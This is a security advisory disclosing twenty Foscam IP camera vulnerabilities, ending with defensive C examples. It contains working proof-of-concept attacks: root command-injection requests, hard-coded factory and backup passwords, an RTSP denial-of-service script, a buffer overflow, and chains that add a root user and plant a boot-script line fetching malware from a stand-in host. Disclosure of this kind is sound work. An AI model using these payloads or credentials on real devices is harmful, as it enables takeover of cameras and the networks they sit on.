Foscam IP Camera Multiple Vulnerabilities
=========================================

The latest version of this advisory is available at:
https://sintonen.fi/advisories/foscam-ip-camera-multiple-vulnerabilities.txt


Overview
--------

Foscam IP Cameras have multiple vulnerabilities that lead to full device
compromise.


Description
-----------

There are a number of critical security vulnerabilities in the Foscam IP
Cameras. Here is a brief summary of some of the issues covered by this
advisory:

- unauthenticated remote command execution as root
- authenticated remote command execution as root (x2)
- unauthenticated denial of service of the RTSP video feed
- unauthenticated administrative credential disclosure
- unauthenticated stack-based buffer overflow
- unauthenticated remote telnetd switch (turn telnetd on/off)
- unauthenticated persistent cross-site scripting
- hidden factory credentials
- the device "IP firewall" doesn't actually firewall much


Impact
------

An unauthenticated attacker can persistently compromise the Foscam IP Cameras
by employing a number of different methods, leading to full loss of
confidentiality, integrity and availability, depending on the actions of the
attacker. The compromised device can be used for further actions such as DDoS
or other malicious activity.

If the device is in a corporate local area network and the attacker gains
access to the network, they can compromise the device and infect it with
persistent remote access malware. The malware would then allow the attackers
unfettered access to the corporate network and the associated resources.


Details
-------

There are multiple vulnerabilities in the Foscam cameras. Not all of them are
present in all models, however.


1. Insecure Default Credentials: admin (CWE-255) [CVE-2018-19063]

The devices use non-random default credentials of: admin:(blank). A remote
network attacker can gain privileged access to a vulnerable device if these
credentials have not been changed.
It is also possible to upload and download files with the built-in FTP server
(port 50021) and to watch the RTSP video feed.


2. Insecure Default Credentials: ftpuser1 (CWE-255) [CVE-2018-19064]

The built-in FTP user (ftpuser1) has an empty password.


3. Use of Hard-coded Credentials: ftpuser1 (CWE-798) [CVE-2018-19064]

The built-in FTP user password cannot be changed by any normal means. Even
after logging in successfully, the user cannot change its own password.


4. Use of Hard-coded Credentials: Configuration back-up file (CWE-798)
   [CVE-2018-19065, CVE-2018-19066]

The Foscam device configuration can be exported from the device. The exported
file is an OpenSSL-encrypted tar.gz archive. The password used is BpP+2R9*Q
(or for older models: Pxift*). To extract the configuration file, use the
following command:

$ openssl enc -d -aes-128-cbc -k 'BpP+2R9*Q' < configs.bin | tar zxv


5. Use of Hard-coded Credentials: factory~ (CWE-798) [CVE-2018-19067]

All Foscam models have hidden and hard-coded credentials that allow access to
the device regardless of the currently configured users. The username factory~
and password Ak47@99 enable access to some of the device web user interface
functionalities. The functionalities allowed vary depending on the model of
the device. Some models allow controlling the telnetd service and restoring
the device to factory settings. These models include at least `Opticam i5'.


6. Hidden Functionality: telnetd Switch (CWE-912) [CVE-2018-19068]

The authenticated administrative user can control the telnetd service by
sending the following HTTP requests:

Enable:
http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=root&pwd=toor&cmd=setTelnetSwitch&switch=1

Disable:
http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=root&pwd=toor&cmd=setTelnetSwitch&switch=0

With some models (at least `Opticam i5') this HTTP request also works with the
hidden factory credentials.


7. Remote Command Injection in User Add (CWE-77) [CVE-2018-19070]

The usrName parameter in the CGIProxy.fcgi addAccount functionality ends up in
a command line executed by the shell. Since the web interface is running as
root, the command is executed as root as well. Valid administrative
credentials are needed for exploitation. If the default admin credentials have
not been changed, the following proof of concept creates a file in the root
directory:

$ curl 'http://:88/cgi-bin/CGIProxy.fcgi?usr=admin&pwd=&cmd=addAccount&usrName=`touch+/pwned`&usrPwd=foobar&privilege=2'

# ls -l /pwned
-rw-r--r--    1 root     root             0 May  5 05:12 /pwned


8. Incorrect Permission Assignment for Critical Resource: /mnt/mtd/boot.sh
   (CWE-732) [CVE-2018-19071]

At system start-up the device will execute various start-up scripts. The chain
of execution at boot time is:

/sbin/init -> /etc/inittab -> /etc/init.d/rcS -> /etc/init.d/S90init -> /mnt/mtd/boot.sh

The script /mnt/mtd/boot.sh is world writable, enabling any user to modify it.
The file is stored on flash storage, so any changes to it will be carried over
a system reboot.

File permissions:

-rwxrwxrwx    1 root     root          7547 May  4 21:50 boot.sh


9. Incorrect Permission Assignment for Critical Resource: /mnt/mtd/app
   (CWE-732) [CVE-2018-19072]

The directory containing the persistent version of the software run by the
Foscam device is world writable:

drwxrwxrwx    9 root     root             0 Jan  1  1970 app

The directory itself contains software archives that are extracted to RAM at
boot time:

-rw-r--r--    1 root     root        597164 Nov 21  2014 www.tar.xz
-rw-r--r--    1 root     root       2472788 Nov 21  2014 zbin.tar.xz
-rw-r--r--    1 root     root        519320 Nov 21  2014 zlib.tar.xz
-rw-r--r--    1 root     root       1247616 Aug  5  2014 zmodules.tar.xz

Due to the insecure permissions, any local user can replace the archives to
gain root privileges.


10.
Remote Command injection in /mnt/mtd/boot.sh via ProductConfig.xml (CWE-77)
    [CVE-2018-19073]

/mnt/mtd/boot.sh has a persistent command injection vulnerability:

eval $(cat $product_config_path | grep 'modelName' | awk -F ">" '{print $2}' | awk -F "<" '{printf("MODELNAME=\"%s\"",$1);}')

The vulnerability can be exploited by using shell meta characters in the
modelName in the /mnt/mtd/app/config/ProductConfig.xml file. The crafted
ProductConfig.xml file can be installed on the device by using the
configuration restore functionality. Valid administrative credentials are
needed to exploit this vulnerability.


11. Improper Access Control: Firewall (CWE-284) [CVE-2018-19074, CVE-2018-19075]

The Foscam cameras feature a firewall that is supposed to restrict access to
the device. However, it in fact only protects access to the web user interface
(ports 88 and 443). The IP addresses that are firewalled are still able to
access other services, such as ONVIF (888), FTP (50021), RTSP (65534) and
telnet (23). It is possible to access RTSP at port 88 too, even though the web
log in doesn't work.

The firewall is implemented in a way that discloses information about
credential validity. Invalid credentials lead to error -2, while correct
credentials from a firewalled IP address result in error -8. [CVE-2018-19075]


12. Missing Restriction of Excessive Authentication Attempts (CWE-307)
    [CVE-2018-19076]

The Foscam cameras do not implement sufficient measures to prevent multiple
failed authentication attempts within a short time frame. It is possible to
perform brute force attacks against the login credentials. The problem applies
to at least the FTP server (port 50021) and RTSP (port 65534). The web user
interface has protection against brute force attacks.


13. Denial of service of the RTSP video feed (CWE-400) [CVE-2018-19077]

The Foscam camera RTSP service (RtspServer) has an implementation flaw when
processing the `Content-Length' header. Negative numbers are processed
incorrectly and lead either to an RtspServer crash due to an out-of-bounds
memory read, or to a busy loop where the single request is processed forever
in a tight loop. Since there is a watchdog service that restarts a crashed
service, from the attacker's point of view the hang is preferable. When
executed, the attack disconnects or freezes the current video feed and no new
connections can be made. The only way for the user to recover the video feed
is to reboot the device.

Proof of concept attack:

#!/usr/bin/env python
import socket, sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],65534))
s.sendall('''GET_PARAMETER a RTSP/1.0\r
Content-Length: -44\r
CSeq: 1\r
\r
''')
s.close()

NOTE: This vulnerability doesn't appear to exist in some camera models or
firmware versions. However, it affects at least `Opticam i5'.


14. Administrator Credential Disclosure via Anonymous ONVIF GetStreamUri
    (CWE-862) [CVE-2018-19078]

The Foscam camera ONVIF implementation allows anonymous access. An
unauthenticated attacker is able to extract the administrator user name and
password via the `media' `GetStreamUri' method.

./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl media GetStreamUri "{'ProfileToken': 'prof0'}"
True: {'InvalidAfterReboot': False, 'Timeout': PT0S, 'Uri': rtsp://root:toor@HOST:88/videoMain, 'InvalidAfterConnect': False}

NOTE: This vulnerability doesn't appear to exist in some camera models or
firmware versions. However, it affects at least `Opticam i5'.


15. Unauthenticated Reboot via Anonymous ONVIF SystemReboot (CWE-862)
    [CVE-2018-19079]

The Foscam camera ONVIF implementation allows anonymous access. An
unauthenticated attacker is able to reboot the device by using the
`devicemgmt' `SystemReboot' method.

NOTE: Anonymous access only appears to be possible with some camera models
and/or firmware versions. Anonymous access appears to work with at least
`Opticam i5'.


16.
Unauthenticated Persistent XSS via Anonymous ONVIF SetHostname (CWE-79)
    [CVE-2018-19080]

The Foscam camera ONVIF implementation allows anonymous access. An
unauthenticated attacker is able to trigger a persistent Cross-Site Scripting
attack against the web user interface users.

./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetHostname "{'Name': ''}"

The XSS payload will trigger when the `Status' / `Device Information' page is
displayed.

NOTE: Anonymous access only appears to be possible with some camera models
and/or firmware versions. Anonymous access appears to work with at least
`Opticam i5'.


17. Unauthenticated Remote Command Injection via Anonymous ONVIF SetDNS
    (CWE-77) [CVE-2018-19081]

The Foscam camera ONVIF implementation allows anonymous access. An
unauthenticated attacker is able to trigger remote command execution as root
via the `devicemgmt' `SetDNS' method.

./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS '{"FromDHCP": False, "DNSManual": {"Type":"IPv4", "IPv4Address":"`id>/pwned`"}}'

# ls -l /pwned
-rw-r--r--    1 root     root            24 Dec  4 06:55 /pwned

Note that due to some processing of the parameters, space characters are
removed from the IPv4Address parameter value. They can be replaced with tabs
(\t). A proper exploit would use GetDNS to obtain the original configuration
and restore it with another SetDNS afterwards.

NOTE: Anonymous access only appears to be possible with some camera models
and/or firmware versions. Anonymous access appears to work with at least
`Opticam i5'.


18. Stack-based Buffer Overflow in ONVIF SetDNS (CWE-121) [CVE-2018-19082]

The Foscam camera ONVIF implementation allows anonymous access. An
unauthenticated attacker is able to trigger a remote stack-based buffer
overflow via the `devicemgmt' `SetDNS' method.

./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS "{'FromDHCP': False, 'DNSManual': {'Type':'IPv4', 'IPv4Address':\"`perl -e 'print "A"x128'`\"}}"

Core was generated by `NVTService'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x41414140 in ?? ()
[Current thread is 1 (LWP 1305)]
(gdb) bt
#0  0x41414140 in ?? ()
#1  0x400b3f84 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i r
r0             0x0                 0
r1             0x0                 0
r2             0x2461e4f           38149711
r3             0x0                 0
r4             0x41414141          1094795585
r5             0x41414141          1094795585
r6             0x41414141          1094795585
r7             0x41414141          1094795585
r8             0x41414141          1094795585
r9             0x2431ca0           37952672
r10            0x41166d6c          1091988844
r11            0x41166d68          1091988840
r12            0x400ec254          1074709076
sp             0x41166d40          0x41166d40
lr             0x400b3f84          1074478980
pc             0x41414140          0x41414140
cpsr           0x60000030          1610612784
(gdb)

NOTE: It is likely there are a number of similar crashes in the firmware.

NOTE: Anonymous access only appears to be possible with some camera models
and/or firmware versions. Anonymous access appears to work with at least
`Opticam i5'.


Practical Proof-of-Concept Attacks
----------------------------------

1. As unauthenticated user

1.1. Add new root user to /etc/passwd, enable telnetd, log in as root

$ ./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SetDNS '{"FromDHCP": False, "DNSManual": {"Type":"IPv4", "IPv4Address":"`echo\tpwn::0:0::/root:/bin/sh>>/etc/passwd;telnetd`"}}'
True: {}

$ telnet HOST
Trying HOST...
Connected to HOST.
Escape character is '^]'.

(none) login: pwn

You are welcomed by Foscam R&D.
None of nfsroot found in cmdline.
# id
uid=0(root) gid=0(root) groups=0(root)
#

1.2. Enable telnetd remotely, log in as ftpuser1, install persistent payload

$ curl 'http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=factory~&pwd=Ak47@99&cmd=setTelnetSwitch&switch=1'
0

$ telnet HOST
Trying HOST...
Connected to HOST.
Escape character is '^]'.

(none) login: ftpuser1
Password:
sh: using fallback suid method

You are welcomed by Foscam R&D.
$ echo '(sleep 60;wget http://evil.invalid/malware.sh -O-|sh)&' >>/mnt/mtd/boot.sh

The attacker can now reboot the device by utilizing the anonymous ONVIF
`devicemgmt' `SystemReboot' method. This ensures that the payload gets
downloaded and installed:

./cli.py --host HOST --port 888 -u '' -a '' -w /etc/onvif/wsdl devicemgmt SystemReboot

Another option is to cause a local denial of service situation. The device
watchdog process will then reboot the camera. This can be achieved for example
with:

# echo -e 'for i in `seq 1 500`;do yes|md5sum&\ndone'|sh -i


2. Authenticated user / not yet configured device

2.1. Add new root user to the system, enable telnetd, log in as root

$ curl 'http://HOST:88/cgi-bin/CGIProxy.fcgi?usr=admin&pwd=&cmd=addAccount&usrName=`echo+pwn::0:0::/root:/bin/sh+%3E%3E/etc/passwd;telnetd`&usrPwd=pwned&privilege=2'
0

$ telnet HOST
Trying HOST...
Connected to HOST.
Escape character is '^]'.

(none) login: pwn

You are welcomed by Foscam R&D.
None of nfsroot found in cmdline.
# id
uid=0(root) gid=0(root) groups=0(root)
#

If the device administrator user name and password have been configured, the
`usr' and `pwd' parameters must reflect those values.


Vulnerable Devices
------------------

Foscam manufactures a number of IP cameras that are sold white-labelled under
various brand names. See http://www.Foscam.com/products/IP_Camera.html

The vulnerabilities have been confirmed with an OptiCam i5 HD device (while it
is not listed as an official Foscam product, it seems to be manufactured by
them). Some vulnerabilities were confirmed to exist in `Foscam C2', too.
The following devices are known to be vulnerable:

Model Name   System Firmware Version   Application Firmware Version
Opticam i5   1.5.2.11                  2.21.1.128
Foscam C2    1.11.1.8                  2.72.1.32

Likely vulnerable devices can be found from the internet with:
https://www.shodan.io/search?query=port%3A88+title%3A%22IPCam+Client%22


End User Mitigation
-------------------

- Only use the cameras in a dedicated network or VLAN


Recommendations to Vendor
-------------------------

- Make existing fixes available for all models in a coordinated way.
- Always quote input that ends up in commands executed by the shell, or use
  exec() family functions exclusively. Avoid system() calls. Avoid constructs
  where execl is called with "sh -c %s", since this is the same as a system()
  call.
- Avoid eval in shell scripts on untrusted input.
- Remove unsafe input processing (sprintf, strcpy, strcat, memcpy with
  untrusted length etc).
- Employ a truly random default administrative password and add a sticker at
  the bottom of the device with the password.
- If some user never needs to log on directly, use ! as the hash in the passwd
  file.
- Remove unnecessary hidden functionality such as being able to enable telnetd.
- Remove factory built-in credentials.
- Implement a proper iptables firewall.
- Fix world writable file/directory permissions.
- Always perform proper encoding of HTML special characters.
- Disallow anonymous ONVIF.


Credits
-------

These vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.


Timeline
--------

2016.11.30 discovered the RCE vulnerability in user add.
2016.11.30 wrote a preliminary advisory.
2016.11.30 contacted Verkkokauppa.com and CERT-FI.
2016.12.03 found more vulnerabilities.
2016.12.04 found 2 more RCEs and ONVIF related issues.
2016.12.05 sent preliminary advisory to CERT-FI for coordination.
2017.06.21 adjusted the finding 12 description.
2018.11.01 full disclosure of the vulnerability details.
2018.11.08 added CVE IDs.
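The vendor recommendations above (exec() family instead of system() or "sh -c", no unchecked copies of untrusted input) applied to the two inputs this advisory shows reaching a root shell or a fixed stack buffer: usrName in finding 7 and IPv4Address in findings 17 and 18. This is an added example written for this page, not Foscam firmware code; /bin/echo stands in for the real account-management program and MAX_USER is an assumed limit.

```c
/* Added example, not Foscam firmware code: the vendor recommendations applied
 * to the usrName (finding 7) and IPv4Address (findings 17/18) inputs. */
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_USER 32   /* assumption: firmware user-name length limit */

/* usrName: allowlist [A-Za-z0-9_.-]. A backtick, ';' or '$' fails here, so
 * no metacharacter can ever reach a command line. */
int valid_username(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n >= MAX_USER) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i]) && !strchr("_.-", s[i])) return 0;
    return 1;
}

/* IPv4Address: parse the value instead of copying the raw string, so both a
 * backtick payload and a 128-byte run of 'A' are rejected before any
 * strcpy()/sprintf() into a fixed buffer could happen. */
int valid_ipv4(const char *s) {
    struct in_addr a;
    return inet_pton(AF_INET, s, &a) == 1;
}

/* Run a program from an argv array with execv(): no "sh -c", so the shell is
 * never involved and arguments are passed verbatim. Returns the exit status. */
int run_argv(char *const argv[]) {
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(argv[0], argv); _exit(127); }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* addAccount handler: only a validated name is passed on, as one argv entry.
 * /bin/echo stands in for the real user-add program (assumption). */
int add_account(const char *usr_name) {
    if (!valid_username(usr_name)) return -1;
    char *const argv[] = {"/bin/echo", "adduser", (char *)usr_name, NULL};
    return run_argv(argv);
}
```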
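For finding 13, an added Content-Length parser (written for this page, not Foscam's RtspServer code) that rejects the negative value of the proof-of-concept request instead of letting it become a read size or loop bound; the exact header spelling and the MAX_RTSP_BODY cap are assumptions.

```c
/* Added example, not Foscam's RtspServer: Content-Length parsing that rejects
 * the negative value sent by the finding 13 proof of concept. */
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_RTSP_BODY 4096   /* assumption: largest request body accepted */

/* The advisory's proof-of-concept request, embedded here as sample input. */
static const char RTSP_POC_REQUEST[] =
    "GET_PARAMETER a RTSP/1.0\r\nContent-Length: -44\r\nCSeq: 1\r\n\r\n";

/* Returns the body length 0..MAX_RTSP_BODY, or -1 for a malformed header.
 * Callers must drop the request on -1 and never use the value as a size,
 * read count or loop bound. Assumes the canonical header spelling. */
long rtsp_content_length(const char *req) {
    const char *h = strstr(req, "Content-Length:");
    if (h == NULL) return 0;                    /* no header: no body */
    h += strlen("Content-Length:");
    while (*h == ' ' || *h == '\t') h++;
    if (*h < '0' || *h > '9') return -1;        /* rejects "-44", "+1", "" */
    errno = 0;
    char *end;
    long v = strtol(h, &end, 10);
    if (errno == ERANGE || v > MAX_RTSP_BODY) return -1;
    if (*end != '\r' && *end != '\n') return -1; /* trailing junk */
    return v;
}
```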